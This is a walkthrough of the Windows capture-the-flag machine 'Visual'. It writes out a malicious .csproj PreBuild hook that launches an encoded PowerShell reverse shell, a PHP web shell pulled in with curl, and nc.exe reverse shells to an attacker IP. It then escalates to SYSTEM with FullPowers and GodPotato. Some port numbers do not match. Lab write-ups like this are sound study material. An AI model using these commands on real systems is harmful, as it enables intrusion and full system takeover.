Skip to content

Visual

Windows machine

Foothold

Do not forget to update the /etc/hosts file.

Nmap scan: 

nmap -p- -sV -v -Pn visual.htb

User

Go to http://visual.htb -> server will compile any c# (dotnet 6) project from git.

We will exploit the .csproj file using the PreBuild xml tag: 

<Target Name="PreBuild" BeforeTargets="PreBuildEvent"> <Exec Command="powershell -E <base64>" />

Use powercat to generate payload (reverse shell): 

powercat -c <lhost> -p 8001 -e cmd.exe -ge > encodedreverseshell.ps1

Replace with contents of the encodedreverseshell.ps1 file.

We have to create a git server instance (since it cant access internet). We will use gogs: 

docker pull gogs/gogs
mkdir -p /var/gogs
docker run --name=gogs -p 10022:22 -p 10880:3000 -v /var/gogs:/data gogs/gogs

Go to localhost:10880 and set up the git server instance.
Create a new user.
Push the project to the git instance.

Start a netcat listener: 

nc -lnvp 8001

Copy the git address to the visual.htb app and let it build for you, you should get a reverse shell.

The build is configured to run under the user, not www-data, so we get user privileges right away.

We get the user flag from C:\Users\\Desktop\user.txt: 

cat C:/Users/<user>/Desktop/user.txt

Root

Switch to powershell: 

powershell

Get tasklist: 

tasklist /v

Now to get root we have to think how -> apache is running under root -> the server is run using xampp. 

cd C:/xampp

The Apache root folder is under C:/xampp/htdocs: 

cd htdocs

We just place a powny shell here using python http server on our attacker machine and curl on the victim: 

python3 -m http.server  # attacker
curl http://10.10.14.69:8000/shell.php -o shell.php  # victim

Got to the shell page http://visual.htb/shell.php or something like that.

To get a better shell we curl from the php shell a nc.exe which is located at /usr/share/windows-resources/binaries/nc.exe. 

curl http://10.10.14.69:8000/nc.exe -o nc.exe  # victim

Start a netcat listener at attacker: 

nc -lnvp 8002

Start a netcat from victim 

nc.exe 10.10.14.69 8002 -e cmd.exe

Now we have a working shell we can switch to powershell again: 

powershell

Check who we are ( use /priv for privileges only): 

whoami /all

Now we are nt authority\local service. We have to do a local privesc to get more privileges. Examples here.

Use FullPowers to get more privileges.
Download binary from releases -> python http server -> download it to victim: 

curl http://10.10.14.69:8000/FullPowers.exe -o FullPowers.exe
./FullPowers.exe

Check privileges: 

whoami /priv
We get 
SeAssignPrimaryToken -> true
SeImpersonate -> true

To exploit this, we can use one of the potatoes.
In this case we use the GodPotato.

Again, python server, download potato, we will also download/use again the nc.exe:

Tip

The *C:\Users\Public* path is writable by anyone I guess

curl http://10.10.14.69:8000/GodPotato-NET4.exe -o GodPotato-NET4.exe
curl http://10.10.14.69:8000/nc.exe -o nc.exe

Run a netcal listener on attacker: 

nc -lnvp 8003/

Create a new shell using the godpotato with Administrator privileges: 

.\GodPotato-NET4.exe -cmd "C:\Users\Public\Downloads\nc.exe 10.10.14.69 8002 -e cmd.exe"

Check privileges and account: 

whoami /all

We are nt authority\system.

Get the root flag: 

cat C:/Users/Administrator/Desktop/root.txt
or 
type root.txt

Written by Jiri Raja - 08-10-2025